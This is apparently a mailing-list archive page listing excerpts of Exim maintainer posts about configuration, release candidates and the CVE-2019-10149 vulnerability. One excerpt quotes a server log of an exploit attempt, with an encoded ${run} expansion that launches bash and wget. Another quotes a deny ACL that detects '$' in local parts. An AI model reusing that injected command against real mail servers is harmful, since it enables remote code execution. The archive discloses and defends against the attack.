Re: [exim] exim4 smarthost out, fetchmail in conf

2019-07-10 Thread Heiko Schlittermann via Exim-users
Martin McCormick via Exim-users (Mi 10 Jul 2019 04:53:06 CEST): > Thank you extremely. I must admit that I am not familiar with > the programming language other than I can tell what it is doing > more or less. Is there a name for it or is it peculiar to exim4? The Debian configuration scheme

Re: [exim] exim4 smarthost out, fetchmail in conf

2019-07-09 Thread Heiko Schlittermann via Exim-users
Martin McCormick via Exim-users (Di 09 Jul 2019 22:33:16 CEST): … > "Warning: No server certificate defined; will use a selfsigned one." Whenever a recent Exim is configured to advertise TLS (tls_advertise_hosts), it tries to create a self-signed certificate until you point Exim to the

Re: [exim] Diagnosing problems authenticating as a client

2019-07-09 Thread Heiko Schlittermann via Exim-users
Boylan, Ross via Exim-users (Di 09 Jul 2019 01:52:23 CEST): > 14:55:44 SMTP>> AUTH LOGIN > 14:55:44 cmd buf flush 12 bytes > 14:55:44 read response data: size=18 > 14:55:44 SMTP<< 334 [gibberish] > 14:55:44 SMTP>> > 14:55:44 cmd buf flush 30 bytes > 14:55:44

Re: [exim] CVE-2019-10149: already vulnerable ?

2019-07-03 Thread Heiko Schlittermann via Exim-users
Marc Haber via Exim-users (Mi 03 Jul 2019 18:17:24 CEST): > On Sun, 23 Jun 2019 20:02:33 +0100, Jeremy Harris via Exim-users > wrote: > > deny local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N > >message = no mate > > This might be a really stupid question, but what exactly does that do?

Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Heiko Schlittermann via Exim-users
Niels Dettenbach via Exim-users (Di 25 Jun 2019 14:48:20 CEST): > Am Dienstag, 25. Juni 2019, 13:53:26 CEST schrieb Jeremy Harris via Exim- > users: > > No recompile needed. smtp_banner. > This only set's the banner, but not the SMTP-Headers " by " which are > "public" too and used as a

Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-23 Thread Heiko Schlittermann via Exim-users
Hello, Thomas Hager via Exim-users (Fr 21 Jun 2019 21:26:11 CEST): > > 2019-06-20 15:13:33 Received from <> H=(.de) > > [89.248.171.57] P=smtp S=1114 > > 2019-06-20 15:13:33 routing failed for > > root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dchec > >

Re: [exim] CVE-2019-10149: 4.87 to 4.91 are vulnerable

2019-06-19 Thread Heiko Schlittermann via Exim-users
Russell King via Exim-users (Di 11 Jun 2019 16:08:28 CEST): > > As I stated in my original post, I've tried subsituting the " " with > both + and %2b. I was using Firefox, I've also used elinks as well. > Nothing works to get a commitdiff. > > >

Re: [exim] just been hacked, could be CVE-2019-10149?

2019-06-19 Thread Heiko Schlittermann via Exim-users
Calum Mackay via Exim-users (Di 11 Jun 2019 01:39:22 CEST): > My mail system has just been hacked; it's running Debian unstable exim > 4.91-9 I just checked https://packages.debian.org/unstable/mail/, and they list 4.92-8 there. So your 4.91 seems to be outdated a bit. But generally speaking,

Re: [exim] CVE-2019-10149: 4.87 to 4.91 are vulnerable

2019-06-13 Thread Heiko Schlittermann via Exim-users
Hi, Russell King (Di 11 Jun 2019 17:49:32 CEST): > I replied to your mail below, honouring the mail-followup-to, but > exim-users has not processed the message despite later messages > coming through. Hm, maybe the root cause is CC to me, when sending to the list. > I essentially said that you

Re: [exim] The most used Exim version is the vulnerable one

2019-06-12 Thread Heiko Schlittermann via Exim-users
Dave Howe via Exim-users (Mi 12 Jun 2019 15:12:26 CEST): > On 12/06/2019 12:01, Gary Stainburn via Exim-users wrote: > > I have just done a "yum update" on my C7 system and there was no EXIM > > update included. Hopefully this will be resolved soon. > > Was under the impression this was already

Re: [exim] The most used Exim version is the vulnerable one

2019-06-12 Thread Heiko Schlittermann via Exim-users
Niels Dettenbach via Exim-users (Di 11 Jun 2019 19:58:14 CEST): > The "initial official" date for patch releases was "officially set" by Exim > project / security list onto the 11.06.2019 (today) - so possibly some "less > aware" (LTS) distributors will use that date ("in respect for the

Re: [exim] CVE-2019-10149: 4.87 to 4.91 are vulnerable

2019-06-11 Thread Heiko Schlittermann via Exim-users
Hi, Russell King (Di 11 Jun 2019 15:33:47 CEST): > Hi, > > While looking for the fix on the web version of git.exim.org, I find that > although I can get a listing based on the branch, I'm unable to get commit > or commitdiffs. > > For example, the page at: > >

Re: [exim] Retry configuration

2019-06-07 Thread Heiko Schlittermann via Exim-users
Richard Jones via Exim-users (Fr 07 Jun 2019 15:40:42 CEST): > > 2019-06-06 16:54:12 Received from f...@jonze-test.com U=foobar P=local S=2796 > id=20190606155412.GA27529@junix.systems > 2019-06-06 16:54:12 H=aspmx.l.google.com [2a00:1450:400c:c02::1b]: Remote > host closed connection in

Re: [exim] short host name in local_domains

2019-06-07 Thread Heiko Schlittermann via Exim-users
Marc Haber via Exim-users (Do 06 Jun 2019 16:07:36 CEST): > Hi, > > in Debian, local_domains gets seeded with "@:localhost" plus whatever > the local administrator has entered to augment the list of > local_domains. Why "localhost"? This would accept messages via SMTP addressed to

Re: [exim] CVE-2019-10149: 4.87 to 4.91 are vulnerable

2019-06-06 Thread Heiko Schlittermann via Exim-users
Hi, Cyborg via Exim-users (Do 06 Jun 2019 13:24:21 CEST): > As the Advisiory is a bit unspecific for a protection, shouldn't a check > for  "$" in > >   deny    message   = Restricted characters in address >      domains   = +local_domains >          local_parts   = ^[.] :

Re: [exim] CVE-2019-10149: 4.87 to 4.91 are vulnerable

2019-06-05 Thread Heiko Schlittermann via Exim-users
The fix for CVE-2019-10149 is public now. https://git.exim.org/exim.git Branch exim-4_91+fixes. Thank you to - Qualys for reporting it. - Jeremy for fixing it. - you for using Exim. Sorry for confusion about the public release. We were forced to react, as details leaked.

Re: [exim] CVE-2019-10149: 4.87 to 4.91 are vulnerable

2019-06-05 Thread Heiko Schlittermann via Exim-users
We will publish the fix today 2019-06-05 15:15 UTC on the exim-4_91+fixes branch of our public Git repo git.exim.org. Distros can release their packages by that date. Sorry for the inconveniences. -- Heiko Schlittermann (unterwegs) signature.asc Description: PGP signature -- ## List details

Re: [exim] CVE-2019-10149: 4.87 to 4.91 are vulnerable

2019-06-04 Thread Heiko Schlittermann via Exim-users
Hi, our non-public security Git repo is git clone ssh://g...@git.exim.org/exim.git Access is granted to the known and trusted SSH keys we have. The branch fix-CVE-2019-10149 contains the fix. It is one commit ahead of the exim-4_91+fixes branch and we'll eventuelly merge it into the +fixes

Re: [exim] CVE-2019-10149: 4.87 to 4.91 are vulnerable

2019-06-03 Thread Heiko Schlittermann via Exim-users
Heiko Schlittermann via Exim-users (Mo 03 Jun 2019 22:29:28 CEST): > t0is expected to be 2019-06-04, 10:00 UTC > t0+7d is expected to be 2019-06-04, 10:00 UTC t0+7d is expected to be 2019-06-11, 10:00 UTC -- Heiko signature.asc Description: PGP signature -- ## List details at

[exim] CVE-2019-10149: 4.87 to 4.91 are vulnerable

2019-06-03 Thread Heiko Schlittermann via Exim-users
CVE-2019-10149 Exim 4.87 to 4.91 We received a report of a possible remote exploit. Currently there is no evidenice of an active use of this exploit. A patch exists already, is being tested, and backported to all versions we released since (and including) 4.87.

Re: [exim] unable to send mails to subdomains - dnslookup defer

2019-05-21 Thread Heiko Schlittermann via Exim-users
necktwi via Exim-users (Di 21 Mai 2019 15:41:43 CEST): > setting mx record to > host2.mydomain.com. 300 IN MX 20 host2.mydomain.com. > > instead of > mydomain.com. 300 IN MX 20 host2.mydomain.com. > fixed the issue. It is not plausible. If there is no MX for host2.mydomain.com, the dns

Re: [exim] unable to send mails to subdomains - dnslookup defer

2019-05-20 Thread Heiko Schlittermann via Exim-users
necktwi via Exim-users (Mo 20 Mai 2019 11:14:36 CEST): > I just reply all the senders. Now I'm manually sending to the mailing list > alone. Is that all you meant by basic mail etiquette? Please let me know. > Below are the dig queries you've asked Yes. (Many(?) Mail User Agents have an action

Re: [exim] Bounce Handling

2019-05-15 Thread Heiko Schlittermann via Exim-users
MaDhAt2r via Exim-users (Mi 15 Mai 2019 20:49:47 CEST): > My clients want to use different email addresses depending on the > department or who is sending them. i.e. bo...@example.com, t...@example.com. > > They want to keep track of bounces/deliveries. > > What I having trouble with is how do I

Re: [exim] Retry testing

2019-05-07 Thread Heiko Schlittermann via Exim-users
Charlie Elgholm via Exim-users (Di 07 Mai 2019 16:43:10 CEST): > Hi! > > I have the following retry-line in my Exim version 4.89: > > \N^[^@]+@telia\.\N * H,4d,15m,8 > > When I try it with "exim -brt t...@telia.com" I get this: > Retry rule: \N^[^@]+@telia\.\N * H,4d,15m; If I

Re: [exim] spool format error: size

2019-05-02 Thread Heiko Schlittermann via Exim-users
exim-users--- via Exim-users (Mo 22 Apr 2019 19:57:42 CEST): … > Exim 4.90.1-1ubuntu1 with sa-exim running on one hosts (Ubuntu standard > config with TLS enabled, sa-exim adding some headers) acting as > smarthost, second Exim generating mail (store some 10+ messages in queue > and trigger

Re: [exim] Shared Hosting + Specific Domain outbound filter

2019-04-29 Thread Heiko Schlittermann via Exim-users
Rafael Wolf via Exim-users (Mo 29 Apr 2019 19:26:59 CEST): > Hi All, > from all domains. > > Example: > > *@customer.com > Subject: encrypt > forward to the Cuda smart host > that will handle encryption based on subject > > *@customer.com > Subject: anything else here > goes out the door from >

Re: [exim] Server Upgrade

2019-04-14 Thread Heiko Schlittermann via Exim-users
Hi, Rainer Dorsch via Exim-users (Sa 13 Apr 2019 18:15:33 CEST): > I want to upgrade my server from Debian Jessie to Debian Stretch. I am afraid > that at some time during the upgrade process, there is an invalid exim An invalid Exim (or configuration) should not cause messages to get lost.

Re: [exim] Strange log message: no IP address found for host bazar2, conectiva.com.br

2019-03-31 Thread Heiko Schlittermann via Exim-users
Jeremy Harris via Exim-users (So 31 Mär 2019 20:43:33 CEST): > On 31/03/2019 19:12, Mike Tubby via Exim-users wrote: > > The log message always refers to the hostname 'bazar2.conectiva.com.br' > > irrespective of the actual host connected? > > > > Has anyone else seen behaviour like this? or

Re: [exim] A way to fetch retry config from postgres

2019-03-14 Thread Heiko Schlittermann via Exim-users
Hi Nikita, Никита via Exim-users (Mi 13 Mär 2019 15:42:27 CET): > I'm trying to fetch the retry portion of exim4.conf from a postgres > database. > The portion is this default string: * * F,2h,15m; G,16h,1h,1.5; F,14d,6h The specs mention "expansion" for

Re: [exim] Exim4 and root aliases? Send a copy to root?

2019-03-10 Thread Heiko Schlittermann via Exim-users
Hany Aziz via Exim-users (So 10 Mär 2019 08:59:05 CET): > Changing the alias in /etc/aliases to > > root: user1, root In theory this would work, in practice it won't with Exim. Exim has a build time "FIXED_NEVER_USERS" list, which in most environments contains "root" and thus it can't be

Re: [exim] Send mail to specific domains via smart host

2019-03-06 Thread Heiko Schlittermann via Exim-users
Hi Rory, Rory Campbell-Lange via Exim-users (Mi 06 Mär 2019 22:43:00 CET): > no_more > > What I believe I need to add is a block like this: > > dns_yahoo_aol: > debug_print = "R: dnslookup_yahoo_aol for $local_part@$domain" > driver = dnslookup > domains =

Re: [exim] EXIM Timeout on tcp required ports

2019-03-05 Thread Heiko Schlittermann via Exim-users
Ryan McClung via Exim-users (Di 05 Mär 2019 15:16:16 CET): > Update on this issue. > > I set 465 as the only TLS port. Time out is still occurring on 465. The > openssl client is connecting successfully but testing with an mta testing > tool like swaks times out. > What is the swaks command line

Re: [exim] Header question, X-Relay-User

2019-03-04 Thread Heiko Schlittermann via Exim-users
jan-jun.2019--- via Exim-users (Mo 04 Mär 2019 19:32:53 CET): > > $ exim -bV > > Exim version 4.92 #3 built 11-Feb-2019 21:35:34 > > "Mine" / the version my hoster is running is: > > $ exim --version > Exim version 4.82 #3 built 10-Feb-2018 19:43:33 ohoh, from Exim's perspective this is quite

Re: [exim] Header question, X-Relay-User

2019-03-04 Thread Heiko Schlittermann via Exim-users
jan-jun.2019--- via Exim-users (Mo 04 Mär 2019 15:27:31 CET): > > Try > > > > exim -bP config | grep -i x-relay-user > > > > and check, if this header is part of your Exim configuration at all. > > Hi, not clear what you mean by "config", but just > "exim -bP | grep -i relay" > leads to

Re: [exim] Header question, X-Relay-User

2019-03-04 Thread Heiko Schlittermann via Exim-users
Markus Robert Kessler via Exim-users (Mo 04 Mär 2019 01:04:04 CET): > Hi Heiko, > > > > > When accessing /usr/sbin/exim4 locally, then Squirrel email client is > > > able to write the header without "X-Relay-User" info. But, > > > > So, probably Squirrel isn't the origin of this header. > > > >

Re: [exim] Header question, X-Relay-User

2019-03-03 Thread Heiko Schlittermann via Exim-users
Sorry for the typo. Heiko Schlittermann via Exim-users (So 03 Mär 2019 22:45:17 CET): > Hm. This is questionable practice, but probably to the topic we should Hm. This is questionable practice, but probably not the topic we should -- Heiko signature.asc Description: PGP signat

Re: [exim] Header question, X-Relay-User

2019-03-03 Thread Heiko Schlittermann via Exim-users
Hi Markus, jan-jun.2019--- via Exim-users (So 03 Mär 2019 17:10:10 CET): > I want to prevent exim from sending out the "X-Relay-User" header line. In the first place I'd try to find the origin of this line. Exim doesn't know about any such line, the X- prefix indicates, that this isn't a

Re: [exim] Spam though my server

2019-02-19 Thread Heiko Schlittermann via Exim-users
Odhiambo Washington via Exim-users (Di 19 Feb 2019 11:20:07 CET): > I am seeing some spam going through my server, but I am not sure what > method is being used by the spammer: > > exim -Mvh 1gw0Ng-0002NF-1H > 1gw0Ng-0002NF-1H-H > mailnull 26 26 > > 1550563436 0 > -received_time_usec .039642 >

Re: [exim] Running Exim4 in docker - how to set the message_size_limit?

2019-02-15 Thread Heiko Schlittermann via Exim-users
Ralph Soika via Exim-users (Fr 15 Feb 2019 08:43:06 CET): > > Do you think we can build a docker image for exim4 together? For > docker-swarm such an image is a perfect solution to allow services so send > out mails via an gateway. And as I said, I am not really the expert. But I > did not found

Re: [exim] Exim, NSS, winbind...

2019-02-11 Thread Heiko Schlittermann via Exim-users
Marco Gaiarin via Exim-users (Mi 30 Jan 2019 17:06:55 CET): > > But some weeks ago i've done a general maintenance of my infrastructure, and > i've discovered that exim refuse to deliver to some recipient because users > are not known. > Mail server was temporarly (more then 60 seconds)

[exim] New release Exim 4.92

2019-02-10 Thread Heiko Schlittermann via Exim-users
Exim 4.92 - About 10 months after the last regular release, we published Exim 4.92 today. You can find it in the following locations: ftp://ftp.exim.org/pub/exim/exim4/ http://ftp.exim.org/pub/exim/exim4/ All files are signed with my GPG key, the same key I use to sign this mail. (You

[exim] New release candidate exim-4.92-RC6 | Feature Freeze

2019-02-02 Thread Heiko Schlittermann via Exim-users
I've just uploaded exim-4.92-RC6 to ftp://ftp.exim.org/pub/exim/exim4/test/ http://ftp.exim.org/pub/exim/exim4/test/ Please download, build and test. Main change is a fix for "dkim_verify_signers" (Bug 2366). Additionally some small changes to the docs are applied. All files there are signed

Re: [exim] NFSv4: failed to set ownership on spool file

2019-01-30 Thread Heiko Schlittermann via Exim-users
Phil Pennock via Exim-users (Mi 30 Jan 2019 03:00:25 CET): > On 2019-01-29 at 10:30 +0100, Heiko Schlittermann via Exim-users wrote: > > - The tcpdump show a V4 SETATTR, but only for the owner (I'd have > > expected the group too), AND the owner is numerical, not user@domain, &

Re: [exim] NFSv4: failed to set ownership on spool file

2019-01-29 Thread Heiko Schlittermann via Exim-users
Graeme Fowler via Exim-users (Di 29 Jan 2019 11:03:19 CET): > Have you got ‘superuser’ mapping switched on so root maps to UID 0 on the NFS > server? Processes with uid=0 can create and chown files on the share. So I'd say, root_squash is not enabled. > This is referred to as no_root_squash

[exim] NFSv4: failed to set ownership on spool file

2019-01-29 Thread Heiko Schlittermann via Exim-users
Hi, we run Exim with $spool_directory on a NFSv4 Share. I do not know the gory details of NFSv4 and what operations are expected to work and which operations are expected to break. - UID mapping seems to be enabled (the files have the right owner, if the id-mapping domains on both sides

[exim] New release candidate exim-4.92-RC5 | Feature Freeze

2019-01-27 Thread Heiko Schlittermann via Exim-users
I've just uploaded exim-4.92-RC5 to ftp://ftp.exim.org/pub/exim/exim4/test/ http://ftp.exim.org/pub/exim/exim4/test/ Please download, build and test. Two small bugs are fixed and the docs are updated and clarified in several places. All files there are signed by me, with the same key I use to

Re: [Exim-users-de] Exim-Anfänger: Grundsätzliche Konfiguration

2019-01-22 Thread Heiko Schlittermann via Exim-users-de
Marc Haber via Exim-users-de (Sa 19 Jan 2019 14:14:01 CET): > On Mon, Jan 14, 2019 at 03:39:30PM +0100, Ali Gürler via Exim-users-de wrote: > > das nicht ist, aber es haben ja hier wohl auch alle irgendwie mal > > angefangen. > > Das ist in der Tat ein Trivialfall, den man mit der >

Re: [exim] Building exim on Debian Stretch

2019-01-16 Thread Heiko Schlittermann via Exim-users
jpff via Exim-users (Mi 16 Jan 2019 21:03:45 CET): > I am sure I a being obtuse here but I run exim on my firewall computer > which for historical reasons runs Debian. I am in the process of upgrading > to Stretch but I cannot build exim. I rather like to have my own build as > (a) Debian

Re: [exim] Patch for Exim 4.91 compile warning

2019-01-16 Thread Heiko Schlittermann via Exim-users
Mike Tubby via Exim-users (Mi 16 Jan 2019 14:58:07 CET): > All, > > When compiling Exim 4.91 on Ubuntu 16.04.5 LTS I get a gcc warning in the > USR1 signal handler: > > gcc exim.c > exim.c: In function ‘usr1_handler’: > exim.c:242:1: warning: ignoring return value of ‘write’, declared with >

[exim] New release candidate exim-4.92-RC4

2018-12-27 Thread Heiko Schlittermann via Exim-users
I've just uploaded exim-4.92-RC4 to ftp://ftp.exim.org/pub/exim/exim4/test/ http://ftp.exim.org/pub/exim/exim4/test/ Please download, build and test. The main difference to RC3 is a fix that should enable Exim to talk to servers that use TLS 1.3. (Bug 2359) All files there are signed by me,

Re: [exim] Exim-4.92-RC3 issues

2018-12-25 Thread Heiko Schlittermann via Exim-users
The Doctor via Exim-users (Mo 24 Dez 2018 20:01:17 CET): > 1) Please defined in DBM where you can add INCLUDES and LIBs > 2) The multiple configuration lines does not seem to work These two questions need more clarification. I'm lost. > 3) I added into my Makefile the local ID for EXim What is

[exim] New release candidate 4.92-RC3

2018-12-19 Thread Heiko Schlittermann via Exim-users
Hi, we need you. I've just packaged a new release candidate exim-4.92-RC3. Please download, build, and test. The only change to RC2 is in the example configuration. So this change may affect packagers that auto-generated theire initial configurations from the example config. The original

Re: [exim] [exim-dev] Exim 4.92-RC1

2018-12-18 Thread Heiko Schlittermann via Exim-users
Paul Hecker via Exim-dev (So 16 Dez 2018 19:52:45 CET): > Hi, > for sure, thanks! exim 4.92-RC2 should work for you, doesn't it? -- Heiko signature.asc Description: PGP signature -- ## List details at https://lists.exim.org/mailman/listinfo/exim-users ## Exim details at http://www.exim.org/

[exim] New release candidate 4.92-RC2

2018-12-18 Thread Heiko Schlittermann via Exim-users
Hello, a new release candidate has been released: 4.92-RC2 It contains the following fixes since RC1 fa287dc3 Re-create test/configure script aaf3e414 Update Changelog for Bug 2351 569a8b23 Log failures to extract envelope addresses from message headers. Bug 2351 22d6c944 doc:

Re: [exim] Exim 4.92-RC1

2018-12-16 Thread Heiko Schlittermann via Exim-users
Please do not cross-post to lists and private addresses. Paul Hecker (Fr 14 Dez 2018 16:24:43 CET): > can no longer compile this version with my current Makefile as there is > WITH_CONTENT_SCAN=yes > enabled and all other scanner interfaces disabled (as DISABLE_MAL_CLAM=yes, >

Re: [exim] exim-4.92RC1 on Ubuntu 18.04

2018-12-16 Thread Heiko Schlittermann via Exim-users
Odhiambo Washington via Exim-users (So 16 Dez 2018 16:54:51 CET): > Hola! > > It's actually my very first time to manually compile anything on Linux so I > request for help. > I am trying to compile the RC on Ubuntu 18.04.1 and it fails as below, > which I cannot make head or tails on since I am

[exim] Exim 4.92-RC1

2018-12-14 Thread Heiko Schlittermann via Exim-users
I've built and uploaded Exim 4.92-RC1 to https://ftp.exim.org/pub/exim/exim4/test The current ChangeLog (since 4.91) and NewStuff files are attached to this message. The tree is still open for commits. Please check if you've any pending bugfixes or additions. We need you: Please download,

Re: [exim] problem sending unknown user to another server

2018-12-04 Thread Heiko Schlittermann via Exim-users
Max Franco via Exim-users (Mo 03 Dez 2018 14:38:46 CET): > this is the log for a forwarded mail (i change domain name and mail > addresses): Do not obfuscate please. Help is almost impossible with changed domains if your issue is realated to mail routing. > 2018-12-03 14:31:22

[exim] New release process ahead

2018-12-02 Thread Heiko Schlittermann via Exim-users
Hello, a new release process will start around 2018-12-07, if you have any important bug fixes, or other commits, please speak up. Best regards from Dresden/Germany Viele Grüße aus Dresden Heiko Schlittermann -- SCHLITTERMANN.de internet & unix support -

Re: [exim] headers_add corner case

2018-12-01 Thread Heiko Schlittermann via Exim-users
Ian Zimmerman via Exim-users (Fr 30 Nov 2018 21:24:30 CET): > What happens if the right hand side for headers_add option is empty > after expansion? Clearly I would rather not add an empty header line > ;-) Hm. What is about RFC 5322, is an empty value header line allowed? If yes, I'd expect

Re: [exim] Disclaimer and DKIM

2018-11-08 Thread Heiko Schlittermann via Exim-users
Julian Bradfield via Exim-users (Do 08 Nov 2018 01:22:12 CST): > you don't do it at the outbound MTA, where do you do it? (Unless, of > course you force everybody to use Exchange and absolutely nothing > else...) As I mentioned, I setup Exim *checking* if the disclaimer exists and ask users to

Re: [exim] Disclaimer and DKIM

2018-11-07 Thread Heiko Schlittermann via Exim-users
Douglas, Daniel via Exim-users (Mi 07 Nov 2018 21:46:38 CST): > We need to add disclaimers to out email and also use DKIM to sign our > messages. Each of these things work individually but if they are both > configured on a transport then the DKIM check fails because the disclaimer is > added

Re: [exim] Problem to Authenticate against two LDAP's

2018-11-01 Thread Heiko Schlittermann via Exim-users
Claudia Koch via Exim-users (Di 30 Okt 2018 13:10:47 CET): > The problem, however, is that there is always an error message: > > Unable to authenticate at present (set_id=x): missing } at end of > condition inside "or" group First I'd repeat the suggestion from Jeremy. 2nd: Can you try to

Re: [exim] no DMARC?

2018-10-27 Thread Heiko Schlittermann via Exim-users
wido.exim--- via Exim-users (Do 25 Okt 2018 17:30:58 CEST): > > > Hi, > > I am running an Ubuntu 18.04 machine and I am trying to get DMARC > working on my Exim. Therefor I have grabbed the Exim source from Ubuntu > 18.10 and compiled it with this Makefile: > >

Re: [exim] Ratelimit database

2018-09-07 Thread Heiko Schlittermann via Exim-users
Juan Bernhard via Exim-users (Mi 05 Sep 2018 13:52:07 CEST): > Hello list, I've recently implemented a ratelimit acl on my servers. I would > like to know how to delete an entry for a specific user in the > /var/spool/exim/db/ratelimit database.  If someone took the time to do a > script, and

Re: [exim] Filter with special characters (!?)

2018-08-28 Thread Heiko Schlittermann via Exim-users
Emanuel Gonzalez via Exim-users (Mo 27 Aug 2018 19:32:32 CEST): > ==> Changing the charset from the configuration file does not work either > ==> I also need to block an issue with the following string: Re: Tu depósito > de $13,710.38 Please attach the raw headers and your configuration

Re: [exim] Block attachment extension

2018-08-23 Thread Heiko Schlittermann via Exim-users
Sławomir Dworaczek via Exim-users (Do 23 Aug 2018 15:47:04 CEST): > this is the whole acl rule > > acl_check_mime: > accept hosts = : > # --- accept messages for abuse / postmaster > accept condition = $acl_m_pm … And the log told you what? -- Heiko signature.asc Description:

Re: [exim] Filter with special characters (!?)

2018-08-23 Thread Heiko Schlittermann via Exim-users
Emanuel Gonzalez via Exim-users (Do 23 Aug 2018 12:48:42 CEST): > Hello, I need to use the following symbols exclamation mark and question mark > (! ?) as characters in a filter but using HEX does not work. > > > discardcondition = ${if match{$header_subject:}{^\277Eres el del > video?\$}}

Re: [exim] Block attachment extension

2018-08-23 Thread Heiko Schlittermann via Exim-users
Sławomir Dworaczek via Exim-users (Do 23 Aug 2018 13:13:45 CEST): > Heloo > how to block attachment with zip rar etc. extension in Exim 4.91 ? > this entry in the configuration has stopped working > > deny condition = ${if match{$mime_boundary}{\N( |\t)$\N}} >message= MIME

Re: [exim] Filter with special characters (!?)

2018-08-22 Thread Heiko Schlittermann via Exim-users
Emanuel Gonzalez via Exim-users (Mi 22 Aug 2018 20:53:00 CEST): > Hi, I'm trying to create a discard rule for the incoming spam email which > contains an special characters in a subject. > > In the exim log i see this: > > 2018-08-22 07:48:12 1fsQgL-000554-6N Entrantes y Salientes autenticados

Re: [exim] Moving a queue to another server

2018-07-12 Thread Heiko Schlittermann via Exim-users
Christian K via Exim-users (Do 12 Jul 2018 11:26:27 CEST): > I am wondering if there is a good way to move all pending mails from > one exim server to another. > It is probably not the best idea to move the files from one spool > directory to another (idea 1). Why not? If you stop the Exim

Re: [exim] Rspamd-Proxy error with exim

2018-06-27 Thread Heiko Schlittermann via Exim-users
Andrew Lewis via Exim-users (Di 26 Jun 2018 21:50:31 CEST): … > Can we revive Rspamd support please? I expect a non-trivial amount of people > are actively using it. I'm more than happy if we can continue (native) rspamd support. As long as rspamd supports the legacy SpamAssassin-derived

Re: [exim] Rspamd-Proxy error with exim

2018-06-27 Thread Heiko Schlittermann via Exim-users
Hi, Emanuel Gonzalez via Exim-users (Fr 15 Jun 2018 13:51:19 CEST): > i talk with the rspamd develop, they say this: > > > "In fact, it is Exim who SHOULD drop fucking legacy protocol support. But I > cannot convince its developers to do that. I have fixed this issue at some > point in the

Re: [exim] Smarthost condition by h_From header variable

2018-06-22 Thread Heiko Schlittermann via Exim-users
Gallai János via Exim-users (Fr 22 Jun 2018 11:36:16 CEST): > Dear Heiko, > > I've tried envelope_sender but Exim says unknow variable. > > The goal is: We would like to use a separate smarthost for specified domains > on real sender ( envelope_sender ) which is in the From: header. The

Re: [exim] callout to Exchange2013

2018-06-22 Thread Heiko Schlittermann via Exim-users
Hi, Fraenzl, Martin via Exim-users (Fr 22 Jun 2018 09:29:50 CEST): > > After finding the example from 2015,I discussed the options with our Exchange > admins. > > When I asked about an example, I talked about the " specialized > router/transport combo" that Heiko mentioned. From my memory

Re: [exim] callout to Exchange2013

2018-06-21 Thread Heiko Schlittermann via Exim-users
Fraenzl, Martin via Exim-users (Do 21 Jun 2018 15:23:26 CEST): > Hi Guys, > > I have an issue with my "verify recipient" acl, where I use a callout to > verify if a user exists or not. > The callout is checking against a Exchange 2013 server farm. > > I found the article below, where Heiko

Re: [exim] Smarthost condition by h_From header variable

2018-06-21 Thread Heiko Schlittermann via Exim-users
Hi, Gallai János via Exim-users (Do 21 Jun 2018 08:34:39 CEST): > Dear Users, > > I am trying to create a smarthost manualroute route depending on From: > header. Here is my router: > > smarthost: > driver = manualroute > domains = ! +local_domains > condition = ${if

Re: [exim] Temporary reject when random sender verification should succeed

2018-06-08 Thread Heiko Schlittermann via Exim-users
Ian Zimmerman via Exim-users (Do 07 Jun 2018 19:30:34 CEST): > On 2018-06-07 16:44, Jeremy Harris wrote: > > > >> 2018-05-29 12:25:40 H=haskell.org [23.253.242.70]:51176 sender verify > > >> defer for : Could not complete > > >> sender verify callout: mail.haskell.org [23.253.242.70] : > > >>

Re: [exim] No debug info but stay in foreground, how?

2018-06-08 Thread Heiko Schlittermann via Exim-users
Ian Zimmerman via Exim-users (Fr 08 Jun 2018 07:37:02 CEST): > I need the foreground behavior to run exim under the supervisor daemon, > but I don't care for the verbose debugging output. How can I limit it > to the absolute minimum? I tried -d-all, but then exim again > disconnects into the

Re: [exim] spool format error (on some list messages)

2018-06-06 Thread Heiko Schlittermann via Exim-users
exim-users--- via Exim-users (Do 31 Mai 2018 21:52:51 CEST): .. > > >> 1fOL7J-0001BL-DC-H > > … > >> 031 X-Spam-Relay-Country: US US ** > >> 090 Subject: [tip:perf/urgent] perf tools: Fix perf.data format > >> description of > >> NRCPUS header > >> 065 X-SA-Exim-Version: 4.2.1 (built Tue,

Re: [exim] present client certificate on server->server connection

2018-06-03 Thread Heiko Schlittermann via Exim-users
Adrian Zaugg via Exim-users (So 03 Jun 2018 02:16:02 CEST): > > After some testing I found: > > tls_certificate and tls_privatekey in the transport section and in the > main configuration do not behave the same what concerns file access, at > least in 4.84_2: > > In opposition to the

Re: [exim] How Does One Stop the Warning: No server cert-- messages?

2018-06-02 Thread Heiko Schlittermann via Exim-users
Martin McCormick via Exim-users (Fr 01 Jun 2018 18:54:05 CEST): > > /var/log/exim4/mainlog has 166 of it's 305 lines occupied with: > > Warning: No server certificate defined; will use a selfsigned one. > Suggested action: either install a certificate or change tls_advertise_hosts > option

Re: [exim] exim4 Versions above about 4.80 Don't Talk to my ISP's smarthost.

2018-06-02 Thread Heiko Schlittermann via Exim-users
Hi, Martin McCormick via Exim-users (Sa 02 Jun 2018 18:33:41 CEST): > > I even wrote a little shell script that one runs > under sudo > > #!/bin/sh > msg=`mailq |awk '{print $3}'` > if ! test -z $msg;then > exim4 -d -M $msg > fi > > That's because there are two other lines besides the

Re: [exim] present client certificate on server->server connection

2018-06-02 Thread Heiko Schlittermann via Exim-users
Hi, Adrian Zaugg via Exim-users (Fr 01 Jun 2018 02:05:04 CEST): > > I try to set tls_certificate and tls_privatekey in remote smtp transport > in order to instruct exim to present a client certificate on a > connection made to another server. I get an error saying: > > 2018-06-01 00:22:34

Re: [exim] exim4 Versions above about 4.80 Don't Talk to my ISP's smarthost.

2018-05-31 Thread Heiko Schlittermann via Exim-users
Martin McCormick via Exim-users (Do 31 Mai 2018 05:02:35 CEST): > In the first place one can not add protocol=smtps to > /etc/exim4/conf.d/transport/30_exim4-config_remote_smtp_smarthost > as this throws an error now that protocol=smtps is not understood. Try $ exim -bP config and

Re: [exim] spool format error (on some list messages)

2018-05-31 Thread Heiko Schlittermann via Exim-users
Hi, it looks as if the last SA-Exim header eliminated the blank line that separates header and body. I'm not sure how the sa_exim processing works, I do not use it for long time now. Does it see the original spooled message and modifies it? After this step, Exim does its own processessing,

Re: [exim] Exim4

2018-05-30 Thread Heiko Schlittermann via Exim-users
Анатолій Кондрюк via Exim-users (Mi 30 Mai 2018 09:34:22 CEST): > Help me please. Exim does not send letters with attachments ... there is > nothing in the logs. In the logs, only the successful delivery of a text > message is displayed. Exim should be agnostic with regard of attachments. As

Re: [exim] exim4 tls relay to office 365, how to be sure my key/cert are used

